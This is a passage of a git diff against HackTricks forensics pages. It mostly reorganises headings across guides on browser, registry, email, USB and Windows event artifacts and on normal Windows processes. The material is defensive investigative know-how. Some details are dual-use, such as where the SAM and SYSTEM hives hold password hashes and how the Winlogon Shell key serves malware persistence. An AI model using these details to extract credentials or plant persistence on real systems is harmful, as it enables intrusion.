* Last active sessions: _**C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge\_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active**_
-## **Safari**
+# **Safari**
The databases can be found in `/Users/$User/Library/Safari`
@@ -258,7 +256,7 @@ The databases can be found in `/Users/$User/Library/Safari`
* **Browser’s built-in anti-phishing:** `defaults read com.apple.Safari WarnAboutFraudulentWebsites`
* The reply should be 1 to indicate the setting is active
-## Opera
+# Opera
The databases can be found in `/Users/$USER/Library/Application Support/com.operasoftware.Opera`
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
index 92e73228..9de3ab60 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
@@ -17,29 +17,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Desofuscation vbs \(cscript.exe\)
-
Some things that could be useful to debug/desofuscate a malicious vbs file:
-### echo
+## echo
```bash
Wscript.Echo "Like this?"
```
-### Commnets
+## Commnets
```text
' this is a comment
```
-### Test
+## Test
```text
cscript.exe file.vbs
```
-### Write data to a file
+## Write data to a file
```aspnet
Function writeBinary(strBinary, strPath)
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index effecb99..8372725a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Local Cloud Storage
-
-## OneDrive
+# OneDrive
In Windows you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`\
And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
@@ -35,7 +33,7 @@ And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log`
Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files syncronized with OneDrive.
-## Google Drive
+# Google Drive
In Widows you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\
This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files...\
@@ -46,7 +44,7 @@ In this table you can find: the **name** of the **synchronized** **files**, modi
The table data of the database **`Sync_config.db`** contains the email address of the account, path of the shared folders and Google Drive version.
-## Dropbox
+# Dropbox
Dropbox uses **SQLite databases** to mange the files. In this \
You can find the databases in the folders:
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index d1bd83d2..ecfff9df 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Office file analysis
-
-## Introduction
+# Introduction
Microsoft has created **dozens of office document file formats**, many of which are popular for the distribution of phishing attacks and malware because of their ability to **include macros** (VBA scripts).
@@ -76,18 +74,18 @@ Sometimes the challenge is not to find hidden static data, but to **analyze a VB
$ soffice path/to/test.docx macro://./standard.module1.mymacro
```
-## [oletools](https://github.com/decalage2/oletools)
+# [oletools](https://github.com/decalage2/oletools)
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
-## Automatic Execution
+# Automatic Execution
Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automatically** **executed**.
-## References
+# References
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index fa8ab04a..cd0e701a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# PDF File analysis
-
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
PDF is an extremely complicated document file format, with enough tricks and hiding places [to write about for years](https://www.sultanik.com/pocorgtfo/). This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled "Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures." It's no longer available at its original URL, but you can [find a copy here](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf). Ange Albertini also keeps a wiki on GitHub of [PDF file format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md).
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
index 5ed092a1..ce05a6db 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# PNG tricks
-
PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correcteness or attempt to repair corrupted PNGs you can use [pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)
You can try to repair corrupted PNGs using online tools like: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/)
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
index 062db4ae..8dbc69d8 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Video and Audio file analysis
-
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the [mediainfo](https://mediaarea.net/en/MediaInfo) tool \(or `exiftool`\) and identify the content type and look at its metadata.
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
index 423af8c8..667d501a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# ZIPs tricks
-
There are a handful of command-line tools for zip files that will be useful to know about.
* `unzip` will often output helpful information on why a zip will not decompress.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index d1122efa..a037b65c 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -16,29 +16,28 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Windows Artifacts
-### Generic Windows Artifacts
+# Generic Windows Artifacts
-#### Windows 10 Notifications
+## Windows 10 Notifications
In the path `\Users\\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
Inside this SQLite database you can find the `Notification` table with all the notifications (in xml format) that may contain interesting data.
-#### Timeline
+## Timeline
Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, executed applications...\
The database resides in the path `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`\
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
-#### ADS/Alternate Data Streams
+## ADS/Alternate Data Streams
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** (from the intranet, Internet...) and some software (like browser) usually put even **more** **information** like the **URL** from where the file was downloaded.
-### **File Backups**
+# **File Backups**
-#### Recycle Bin
+## Recycle Bin
In Vista/Win7/Win8/Win10 the **Reciclye Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Reciycle.bin`).\
When a file is deleted in this folder are created 2 files:
@@ -56,7 +55,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
 (1) (1) (1).png>)
-#### Volume Shadow Copies
+## Volume Shadow Copies
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.\
These backups are usually located in the `\System Volume Information` from the roof of the file system and the name is composed by **UIDs** as in the following image:
@@ -73,15 +72,15 @@ The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRe
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
-#### Office AutoSaved Files
+## Office AutoSaved Files
You can find the office autosaved files in : `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
-### Shell Items
+# Shell Items
A shell item is an item that contains information about how to access another file.
-#### Recent Documents (LNK)
+## Recent Documents (LNK)
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
@@ -107,7 +106,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
In this case the information is going to be saved inside a CSV file.
-#### Jumplists
+## Jumplists
These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application.
@@ -126,11 +125,11 @@ You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman
(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
-#### Shellbags
+## Shellbags
[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags)
-### Use of Windows USBs
+# Use of Windows USBs
It's possible to identify that a USB device was used thanks to the creation of:
@@ -144,23 +143,23 @@ Note that some LNK file instead of pointing to the original path, points to the
The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
-#### Registry Information
+## Registry Information
[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contains interesting information about USB connected devices.
-#### setupapi
+## setupapi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
 (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (4).png>)
-#### USB Detective
+## USB Detective
[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
.png>)
-#### Plug and Play Cleanup
+## Plug and Play Cleanup
The 'Plug and Play Cleanup' scheduled task is responsible for **clearing** legacy versions of drivers. It would appear (based upon reports online) that it also picks up **drivers which have not been used in 30 days**, despite its description stating that "the most current version of each driver package will be kept". As such, **removable devices which have not been connected for 30 days may have their drivers removed**.\
The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup’, and its content is displayed below:
@@ -170,7 +169,7 @@ The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\W
The task references 'pnpclean.dll' which is responsible for performing the cleanup activity additionally we see that the ‘UseUnifiedSchedulingEngine’ field is set to ‘TRUE’ which specifies that the generic task scheduling engine is used to manage the task. The ‘Period’ and ‘Deadline’ values of 'P1M' and 'P2M' within ‘MaintenanceSettings’ instruct Task Scheduler to execute the task once every month during regular Automatic maintenance and if it fails for 2 consecutive months, to start attempting the task during.\
**This section was copied from** [**here**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**.**
-### Emails
+# Emails
The emails contains **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like:
@@ -181,7 +180,7 @@ Also, inside the `References` and `In-Reply-To` headers you can find the ID of t
.png>)
-#### Windows Mail App
+## Windows Mail App
This application saves the emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with `.dat` extension.
@@ -189,7 +188,7 @@ The **metadata** of the emails and the **contacts** can be found inside the **ED
**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails.
-#### Microsoft Outlook
+## Microsoft Outlook
When Exchange servers or Outlook clients are used there are going to be some MAPI headers:
@@ -209,31 +208,31 @@ You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nuc
.png>)
-#### Outlook OST
+## Outlook OST
When Microsoft Outlook is configured **using** **IMAP** or using an **Exchange** server, it generates a **OST** file that stores almost the same info as the PST file. It keeps the file synchronized with the server for the l**ast 12 months**, with a **max file-size of 50GB** and in the **same folder as the PST** file is saved.
You can inspect this file using [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html).
-#### Recovering Attachments
+## Recovering Attachments
You may be able to find them in the folder:
* `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -> IE10
* `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -> IE11+
-#### Thunderbird MBOX
+## Thunderbird MBOX
**Thunderbird** stores the information in **MBOX** **files** in the folder `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`
-### Thumbnails
+# Thumbnails
When a user access a folder and organised it using thumbnails, then a `thumbs.db` file is created. This db **stores the thumbnails of the images** of the folder even if they are deleted.\
in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path (\IP\folder...).
It is possible to read this file with the tool [**Thumbsviewer**](https://thumbsviewer.github.io).
-#### Thumbcache
+## Thumbcache
Beginning with Windows Vista, **thumbnail previews are stored in a centralized location on the system**. This provides the system with access to images independent of their location, and addresses issues with the locality of Thumbs.db files. The cache is stored at **`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`** as a number of files with the label **thumbcache\_xxx.db** (numbered by size); as well as an index used to find thumbnails in each sized database.
@@ -244,7 +243,7 @@ Beginning with Windows Vista, **thumbnail previews are stored in a centralized l
You can read this file using [**ThumbCache Viewer**](https://thumbcacheviewer.github.io).
-### Windows Registry
+# Windows Registry
The Windows Registry Contains a lot of **information** about the **system and the actions of the users**.
@@ -260,7 +259,7 @@ The files containing the registry are located in:
From Windows Vista and Windows 2008 Server upwards there are some backups of the `HKEY_LOCAL_MACHINE` registry files in **`%Windir%\System32\Config\RegBack\`**.\
Also from these versions, the registry file **`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`** is created saving information about program executions.
-#### Tools
+## Tools
Some tools are useful to analyzed the registry files:
@@ -269,28 +268,28 @@ Some tools are useful to analyzed the registry files:
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry.
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded.
-#### Recovering Deleted Element
+## Recovering Deleted Element
When a key is deleted it's marked as such but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys.
-#### Last Write Time
+## Last Write Time
Each Key-Value contains a **timestamp** indicating the last time it was modified.
-#### SAM
+## SAM
The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system.\
In `SAM\Domains\Account\Users` you can obtain the username, the RID, last logon, last failed logon, login counter, password policy and when the account was created. In order to get the **hashes** you also **need** the file/hive **SYSTEM**.
-#### Interesting entries in the Windows Registry
+## Interesting entries in the Windows Registry
{% content-ref url="interesting-windows-registry-keys.md" %}
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
{% endcontent-ref %}
-### Programs Executed
+# Programs Executed
-#### Basic Windows Processes
+## Basic Windows Processes
in the following page you can learn about the basic Windows processes to detect suspicious behaviours:
@@ -298,15 +297,15 @@ in the following page you can learn about the basic Windows processes to detect
[windows-processes.md](windows-processes.md)
{% endcontent-ref %}
-#### Windows RecentAPPs
+## Windows RecentAPPs
Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched.
-#### BAM
+## BAM
You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry).
-#### Windows Prefetch
+## Windows Prefetch
Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed in less time.
@@ -326,7 +325,7 @@ To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/E
.png>)
-#### Superprefetch
+## Superprefetch
**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
@@ -335,7 +334,7 @@ In these databases you can find the **name** of the **program**, **number** of *
You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
-#### SRUM
+## SRUM
**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data en an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
@@ -357,7 +356,7 @@ You can obtain the date from this file using the tool [**srum\_dump**](https://g
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
-#### AppCompatCache (ShimCache)
+## AppCompatCache (ShimCache)
**Shimcache**, also known as **AppCompatCache**, is a component of the **Application Compatibility Database**, which was created by **Microsoft** and used by the operating system to identify application compatibility issues.
@@ -381,7 +380,7 @@ You can use the tool [**AppCompatCacheParser**](https://github.com/EricZimmerman
.png>)
-#### Amcache
+## Amcache
The **Amcache.hve** file is a registry file that stores the information of executed applications. It's located in `C:\Windows\AppCompat\Programas\Amcache.hve`
@@ -395,21 +394,21 @@ AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student
The most interesting CVS file generated if the `Amcache_Unassociated file entries`.
-#### RecentFileCache
+## RecentFileCache
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
-#### Scheduled tasks
+## Scheduled tasks
You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
-#### Services
+## Services
You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
-#### **Windows Store**
+## **Windows Store**
The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
@@ -419,7 +418,7 @@ Inside the Application table of this database it's possible to find the columns:
It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
-### Windows Events
+# Windows Events
Information that appears inside Windows events:
@@ -437,7 +436,7 @@ The location of the event files can be found in the SYSTEM registry in **`HKLM\S
They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
-#### Security
+## Security
These event register the accesses and give information about the security configuration.\
they can be found in `C:\Windows\System32\winevt\Security.evtx`.
@@ -476,22 +475,22 @@ The Status and sub status information of the event s can indicate more details a
.png>)
-#### Recovering Windows Events
+## Recovering Windows Events
It's highly recommended to turn off the suspicious PC by **unplugging it** to maximize the probabilities of recovering the Windows Events. In case they were deleted, a tool that can be useful to try to recover them is [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor) indicating the **evtx** extension.
-### Identifying Common Attacks with Windows Events
+# Identifying Common Attacks with Windows Events
-#### Brute-Force Attack
+## Brute-Force Attack
A brute-force attack can be easily identifiable because **several EventIDs 4625 will appear**. **If** the attack was **successful**, after the EventIDs 4625, **an EventID 4624 will appear**.
-#### Time Change
+## Time Change
This is awful for the forensics team as all the timestamps will be modified.\
This event is recorded by the EventID 4616 inside the Security Event log.
-#### USB devices
+## USB devices
The following System EventIDs are useful:
@@ -500,11 +499,11 @@ The following System EventIDs are useful:
The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted.
-#### Turn Off / Turn On
+## Turn Off / Turn On
The ID 6005 of the "Event Log" service indicates the PC was turned On. The ID 6006 indicates it was turned Off.
-#### Logs Deletion
+## Logs Deletion
The Security EventID 1102 indicates the logs were deleted.
diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
index 768cdcff..fc59160c 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
@@ -16,39 +16,38 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Interesting Windows Registry Keys
-### **Windows system info**
+# **Windows system info**
-#### Version
+## Version
* **`Software\Microsoft\Windows NT\CurrentVersion`**: Windows version, Service Pack, Installation time and the registered owner
-#### Hostname
+## Hostname
* **`System\ControlSet001\Control\ComputerName\ComputerName`**: Hostname
-#### Timezone
+## Timezone
* **`System\ControlSet001\Control\TimeZoneInformation`**: TimeZone
-#### Last Access Time
+## Last Access Time
* **`System\ControlSet001\Control\Filesystem`**: Last time access (by default it's disabled with `NtfsDisableLastAccessUpdate=1`, if `0`, then, it's enabled).
* To enable it: `fsutil behavior set disablelastaccess 0`
-#### Shutdown Time
+## Shutdown Time
* `System\ControlSet001\Control\Windows`: Shutdown time
* `System\ControlSet001\Control\Watchdog\Display`: Shutdown count (only XP)
-#### Network Information
+## Network Information
* **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**: Network interfaces
* **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: First and last time a network connection was performed and connections through VPN
* **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}` (for XP) & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: Network type (0x47-wireless, 0x06-cable, 0x17-3G) an category (0-Public, 1-Private/Home, 2-Domain/Work) and last connections
-#### Shared Folders
+## Shared Folders
* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** (CSCFLAGS) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC`
* CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache
@@ -58,7 +57,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* CSCFlag=2048: This setting is only on Win 7 & 8 and is the default setting until you disable “Simple file sharing” or use the “advanced” sharing option. It also appears to be the default setting for the “Homegroup”
* CSCFlag=768 -> This setting was only seen on shared Print devices.
-#### AutoStart programs
+## AutoStart programs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
@@ -66,15 +65,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`
* `Software\Microsoft\Windows\CurrentVersion\Run`
-#### Explorer Searches
+## Explorer Searches
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: What the user searched for using explorer/helper. The item with `MRU=0` is the last one.
-#### Typed Paths
+## Typed Paths
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: Paths types in the explorer (only W10)
-#### Recent Docs
+## Recent Docs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: Recent documents opened by the user
* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`:Recent office docs. Versions:
@@ -86,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* 15.0 office 2013
* 16.0 Office 2016
-#### MRUs
+## MRUs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LasVisitedPidlMRU`
@@ -98,12 +97,12 @@ Indicates the path from where the executable was executed
Indicates files opened inside an opened Window
-#### Last Run Commands
+## Last Run Commands
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Policies\RunMR`
-#### User AssistKey
+## User AssistKey
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`
@@ -114,7 +113,7 @@ The GUID is the id of the application. Data saved:
* GUI application name (this contains the abs path and more information)
* Focus time and Focus name
-### Shellbags
+# Shellbags
When you open a directory Windows saves data about how to visualize the directory in the registry. These entries are known as Shellbags.
@@ -137,9 +136,9 @@ Note 2 things from the following image:
.png>)
-### USB information
+# USB information
-#### Device Info
+## Device Info
The registry `HKLM\SYSTEM\ControlSet001\Enum\USBSTOR` monitors each USB device that has been connected to the PC.\
Within this registry it's possible to find:
@@ -161,19 +160,19 @@ With the previous information the registry `SOFTWARE\Microsoft\Windows Portable
.png>)
-#### User that used the device
+## User that used the device
Having the **{GUID}** of the device it's now possible to **check all the NTUDER.DAT hives of all the users** searching for the GUID until you find it in one of them (`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`)
.png>)
-#### Last mounted
+## Last mounted
Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).
 (1) (1).png>)
-#### Volume Serial Number
+## Volume Serial Number
In `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` you can find the volume serial number. **Knowing the volume name and the volume serial number you can correlate the information** from LNK files that uses that information.
@@ -183,7 +182,7 @@ Note that when a USB device is formatted:
* A new volume serial number is created
* The physical serial number is kept
-#### Timestamps
+## Timestamps
In `System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\` you can find the first and last time the device was connected:
diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
index c8ed7924..815ad67b 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
@@ -17,22 +17,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Windows Processes
-
-### smss.exe
+## smss.exe
It's called **Session Manager**.\
Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.\
Also, more sessions apart from 0 and 1 may mean that RDP sessions are occurring.
-### csrss.exe
+## csrss.exe
Is the **Client/Server Run Subsystem Process**.\
It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps** **drive** **letters**, create **temp** **files** and handles the **shutdown** **process**.\
There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree).\
Another one is created **per new Session**.
-### winlogon.exe
+## winlogon.exe
This is Windows Logon Process.\
It's responsible for user **logon**/**logoffs**.\
@@ -40,24 +38,24 @@ It launches **logonui.exe** to ask for username and password and then calls **ls
Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.\
Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
-### wininit.exe
+## wininit.exe
This is the **Windows Initialization Process**. It launches **services.exe**, **lsass.exe** and **lsm.exe** in Session 0.\
There should only be 1 process.
-### userinit.exe
+## userinit.exe
Load the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.\
It launches **explorer.exe**.
-### lsm.exe
+## lsm.exe
This is the **Local Session Manager**.\
